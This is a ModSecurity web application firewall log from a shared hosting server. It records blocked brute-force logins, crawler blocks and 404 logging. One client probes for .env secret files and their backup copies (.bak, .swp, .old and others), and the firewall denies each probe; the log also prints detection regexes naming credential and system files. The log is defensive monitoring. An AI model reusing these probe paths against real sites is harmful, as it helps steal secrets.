[Tue May 26 17:40:34.866608 2026] [security2:error] [pid 912729:tid 912980] [client 223.235.98.214:25216] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWNukoCupl_NMj3qz-aFwAAAPw"]
[Tue May 26 17:40:34.866808 2026] [security2:error] [pid 912729:tid 912980] [client 223.235.98.214:25216] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWNukoCupl_NMj3qz-aFwAAAPw"]
[Tue May 26 17:40:35.135529 2026] [security2:error] [pid 912729:tid 912918] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNukoCupl_NMj3qz-aFgAAAL4"]
[Tue May 26 17:40:38.015736 2026] [security2:error] [pid 912729:tid 912949] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNvUoCupl_NMj3qz-aUgAAAN0"]
[Tue May 26 17:40:40.257462 2026] [security2:error] [pid 912729:tid 912964] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNv0oCupl_NMj3qz-agQAAAOw"]
[Tue May 26 17:40:43.112694 2026] [security2:error] [pid 912729:tid 912884] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNwkoCupl_NMj3qz-axgAAAJ4"]
[Tue May 26 17:40:43.460795 2026] [security2:error] [pid 912729:tid 912814] [remote 165.22.95.96:33774] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 96.95.22.165.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahWNw0oCupl_NMj3qz-a1gAAilQ"]
[Tue May 26 17:40:43.847751 2026] [security2:error] [pid 912729:tid 912798] [remote 216.73.216.30:56003] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWNw0oCupl_NMj3qz-a5gAApEQ"]
[Tue May 26 17:40:44.508256 2026] [security2:error] [pid 912729:tid 912886] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNxEoCupl_NMj3qz-a7QAAAKA"]
[Tue May 26 17:40:47.385092 2026] [security2:error] [pid 912729:tid 912983] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNxkoCupl_NMj3qz-bOQAAAP8"]
[Tue May 26 17:40:49.720100 2026] [security2:error] [pid 912729:tid 912964] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNyUoCupl_NMj3qz-bfwAAAOw"]
[Tue May 26 17:40:50.185325 2026] [security2:error] [pid 912729:tid 912938] [client 114.119.147.166:21175] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.jobs.ucdc.co.in"] [uri "/getpagedata.php"] [unique_id "ahWNykoCupl_NMj3qz-bmQAAANI"], referer: https://www.jobs.ucdc.co.in/jobdetail.php?empjpid=MzE%3D
[Tue May 26 17:40:51.086251 2026] [security2:error] [pid 912729:tid 912911] [client 47.128.47.143:47522] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "cicodev.org"] [uri "/en/k2/user/content/178-budget-transparency"] [unique_id "ahWNy0oCupl_NMj3qz-bswAAALc"]
[Tue May 26 17:40:51.591772 2026] [security2:error] [pid 912729:tid 912928] [client 208.84.100.247:59276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "panel.ecosol.plus"] [uri "/.env"] [unique_id "ahWNy0oCupl_NMj3qz-bvQAAAMg"]
[Tue May 26 17:40:51.595080 2026] [security2:error] [pid 912729:tid 912944] [client 208.84.100.247:59328] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "panel.ecosol.plus"] [uri "/backend/.env"] [unique_id "ahWNy0oCupl_NMj3qz-bzAAAANg"]
[Tue May 26 17:40:51.595544 2026] [security2:error] [pid 912729:tid 912983] [client 208.84.100.247:59320] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "panel.ecosol.plus"] [uri "/api/.env"] [unique_id "ahWNy0oCupl_NMj3qz-b0wAAAP8"]
[Tue May 26 17:40:51.596795 2026] [security2:error] [pid 912729:tid 912918] [client 208.84.100.247:59312] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "panel.ecosol.plus"] [uri "/app/.env"] [unique_id "ahWNy0oCupl_NMj3qz-b0AAAAL4"]
[Tue May 26 17:40:52.232684 2026] [security2:error] [pid 912729:tid 912909] [client 208.84.100.247:59390] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "panel.ecosol.plus"] [uri "/.env.production.copy"] [unique_id "ahWNzEoCupl_NMj3qz-b6wAAALU"]
[Tue May 26 17:40:52.234648 2026] [security2:error] [pid 912729:tid 912870] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNy0oCupl_NMj3qz-b4AAAAJA"]
[Tue May 26 17:40:53.270612 2026] [security2:error] [pid 912729:tid 912886] [client 208.84.100.247:59786] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "panel.ecosol.plus"] [uri "/.env.production~"] [unique_id "ahWNzUoCupl_NMj3qz-cDAAAAKA"]
[Tue May 26 17:40:53.270820 2026] [security2:error] [pid 912729:tid 912887] [client 208.84.100.247:59812] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "panel.ecosol.plus"] [uri "/.env.production.orig"] [unique_id "ahWNzUoCupl_NMj3qz-cCgAAAKE"]
[Tue May 26 17:40:53.270844 2026] [security2:error] [pid 912729:tid 912908] [client 208.84.100.247:59630] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "panel.ecosol.plus"] [uri "/.env.copy"] [unique_id "ahWNzUoCupl_NMj3qz-cDgAAALQ"]
[Tue May 26 17:40:53.271564 2026] [security2:error] [pid 912729:tid 912880] [client 208.84.100.247:59726] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "panel.ecosol.plus"] [uri "/.env.production.bak"] [unique_id "ahWNzUoCupl_NMj3qz-cEgAAAJo"]
[Tue May 26 17:40:53.272240 2026] [security2:error] [pid 912729:tid 912988] [client 208.84.100.247:59654] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "panel.ecosol.plus"] [uri "/.env.local.old"] [unique_id "ahWNzUoCupl_NMj3qz-cFQAAAQQ"]
[Tue May 26 17:40:53.272502 2026] [security2:error] [pid 912729:tid 912865] [client 208.84.100.247:59596] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "panel.ecosol.plus"] [uri "/.env.backup"] [unique_id "ahWNzUoCupl_NMj3qz-cGQAAAIs"]
[Tue May 26 17:40:53.272564 2026] [security2:error] [pid 912729:tid 912948] [client 208.84.100.247:59742] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "panel.ecosol.plus"] [uri "/.env.production.old"] [unique_id "ahWNzUoCupl_NMj3qz-cEwAAANw"]
[Tue May 26 17:40:53.272698 2026] [security2:error] [pid 912729:tid 912886] [client 208.84.100.247:59586] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "panel.ecosol.plus"] [uri "/.env.bak"] [unique_id "ahWNzUoCupl_NMj3qz-cFwAAAKA"]
[Tue May 26 17:40:53.273575 2026] [security2:error] [pid 912729:tid 912959] [client 208.84.100.247:59690] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "panel.ecosol.plus"] [uri "/.env.local~"] [unique_id "ahWNzUoCupl_NMj3qz-cEAAAAOc"]
[Tue May 26 17:40:53.275497 2026] [security2:error] [pid 912729:tid 912905] [client 208.84.100.247:59696] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "panel.ecosol.plus"] [uri "/.env.local.swp"] [unique_id "ahWNzUoCupl_NMj3qz-cEQAAALE"]
[Tue May 26 17:40:53.275497 2026] [security2:error] [pid 912729:tid 912863] [client 208.84.100.247:59758] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "panel.ecosol.plus"] [uri "/.env.production.backup"] [unique_id "ahWNzUoCupl_NMj3qz-cCwAAAIk"]
[Tue May 26 17:40:53.275590 2026] [security2:error] [pid 912729:tid 912951] [client 208.84.100.247:59724] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "panel.ecosol.plus"] [uri "/.env.local.copy"] [unique_id "ahWNzUoCupl_NMj3qz-cHAAAAN8"]
[Tue May 26 17:40:53.275680 2026] [security2:error] [pid 912729:tid 912907] [client 208.84.100.247:59638] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "panel.ecosol.plus"] [uri "/.env.local.bak"] [unique_id "ahWNzUoCupl_NMj3qz-cGwAAALM"]
[Tue May 26 17:40:53.275687 2026] [security2:error] [pid 912729:tid 912884] [client 208.84.100.247:59622] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "panel.ecosol.plus"] [uri "/.env.orig"] [unique_id "ahWNzUoCupl_NMj3qz-cDwAAAJ4"]
[Tue May 26 17:40:53.275696 2026] [security2:error] [pid 912729:tid 912938] [client 208.84.100.247:59802] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "panel.ecosol.plus"] [uri "/.env.production.swp"] [unique_id "ahWNzUoCupl_NMj3qz-cDQAAANI"]
[Tue May 26 17:40:53.276048 2026] [security2:error] [pid 912729:tid 912987] [client 208.84.100.247:59608] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "panel.ecosol.plus"] [uri "/.env.swp"] [unique_id "ahWNzUoCupl_NMj3qz-cGAAAAQM"]
[Tue May 26 17:40:53.276443 2026] [security2:error] [pid 912729:tid 912864] [client 208.84.100.247:59668] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "panel.ecosol.plus"] [uri "/.env.local.backup"] [unique_id "ahWNzUoCupl_NMj3qz-cHgAAAIo"]
[Tue May 26 17:40:53.276697 2026] [security2:error] [pid 912729:tid 912937] [client 208.84.100.247:59588] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "panel.ecosol.plus"] [uri "/.env.old"] [unique_id "ahWNzUoCupl_NMj3qz-cHQAAANE"]
[Tue May 26 17:40:53.277034 2026] [security2:error] [pid 912729:tid 912981] [client 208.84.100.247:59710] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "panel.ecosol.plus"] [uri "/.env.local.orig"] [unique_id "ahWNzUoCupl_NMj3qz-cFAAAAP0"]
[Tue May 26 17:40:53.278164 2026] [security2:error] [pid 912729:tid 912949] [client 208.84.100.247:59602] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "panel.ecosol.plus"] [uri "/.env~"] [unique_id "ahWNzUoCupl_NMj3qz-cHwAAAN0"]
[Tue May 26 17:40:54.529479 2026] [security2:error] [pid 912729:tid 912941] [client 57.141.2.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWNzkoCupl_NMj3qz-cOQAAANU"]
[Tue May 26 17:40:55.321542 2026] [security2:error] [pid 912729:tid 912743] [remote 167.71.130.119:48086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 119.130.71.167.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWNz0oCupl_NMj3qz-cTwAAyA0"]
[Tue May 26 17:40:56.464509 2026] [security2:error] [pid 912729:tid 912917] [client 223.235.98.214:5078] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWN0EoCupl_NMj3qz-cawAAAL0"]
[Tue May 26 17:40:56.464697 2026] [security2:error] [pid 912729:tid 912917] [client 223.235.98.214:5078] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWN0EoCupl_NMj3qz-cawAAAL0"]
[Tue May 26 17:40:56.632101 2026] [security2:error] [pid 912729:tid 912860] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWN0EoCupl_NMj3qz-cZAAAAIY"]
[Tue May 26 17:40:59.031363 2026] [security2:error] [pid 912729:tid 912944] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWN0koCupl_NMj3qz-cqgAAANg"]
[Tue May 26 17:40:59.212236 2026] [security2:error] [pid 912729:tid 912772] [remote 216.73.216.30:16324] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWN00oCupl_NMj3qz-cvAAAoSo"]
[Tue May 26 17:41:01.275525 2026] [security2:error] [pid 912729:tid 912974] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWN1EoCupl_NMj3qz-c4gAAAPY"]
[Tue May 26 17:41:01.738055 2026] [security2:error] [pid 912729:tid 912947] [client 67.218.5.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWN1UoCupl_NMj3qz-dBQAAANs"], referer: https://www.anujtradingco.com/
[Tue May 26 17:41:03.730481 2026] [security2:error] [pid 912729:tid 912921] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWN10oCupl_NMj3qz-dLwAAAME"]
[Tue May 26 17:41:04.214458 2026] [security2:error] [pid 912729:tid 912790] [remote 216.73.216.30:16324] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWN2EoCupl_NMj3qz-dUgAArjw"]
[Tue May 26 17:41:04.294416 2026] [security2:error] [pid 912729:tid 912972] [client 67.218.5.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWN2EoCupl_NMj3qz-dUwAAAPQ"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1460809&moderation-hash=73b0cbe0ac89cadd9288c857cd3e5de5
[Tue May 26 17:41:04.354234 2026] [security2:error] [pid 912729:tid 912885] [client 14.172.158.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWN10oCupl_NMj3qz-dRQAAAJ8"]
[Tue May 26 17:41:06.031686 2026] [security2:error] [pid 912729:tid 912864] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWN2UoCupl_NMj3qz-ddgAAAIo"]
[Tue May 26 17:41:07.245635 2026] [security2:error] [pid 912729:tid 912929] [client 223.235.98.214:3248] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWN20oCupl_NMj3qz-dmgAAAMk"]
[Tue May 26 17:41:07.245797 2026] [security2:error] [pid 912729:tid 912929] [client 223.235.98.214:3248] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWN20oCupl_NMj3qz-dmgAAAMk"]
